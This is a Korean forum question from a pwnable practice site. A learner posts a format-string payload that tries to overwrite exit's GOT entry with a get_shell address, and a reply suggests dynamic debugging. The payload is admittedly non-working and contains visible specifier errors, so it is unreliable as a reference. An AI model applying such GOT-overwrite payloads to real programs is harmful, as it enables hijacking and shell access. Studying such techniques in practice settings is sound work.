개념 내용 보고 Exploit를 작성해 봤는데 shell 획득이 안 되네요..
일단 exit_got을 get_shell 함수 주소로 바꾸는 흐름으로 진행하고
payload를 개념 내용에서 보았던 내용으로 payload를 작성해 봤는데 뭐가 문제일까요..?
# exit_got_addr : 0x0804a024
# get_shell_addr : 0x08048609
fstring = f"%{0x04}c%13$hhn".encode()
fstring += f"%{0x08 - 0x04}c%14hhn".encode()
fstring += f"%{0x09 - 0x08}c%11hhn".encode()
fstring += f"%{0x86 - 0x09}c%12hhn".encode()
fstring = fstring.ljust(40,b'a')
fstring += p32(exit_got)
fstring += p32(exit_got+1)
fstring += p32(exit_got+2)
fstring += p32(exit_got+3)
#pwnable
작성자 정보
답변
1
검을현
세계수
동적 디버깅을 해서 원하는 주소에 제대로 입력하는 값이 제대로 들어갔는지 한번 확인해보세요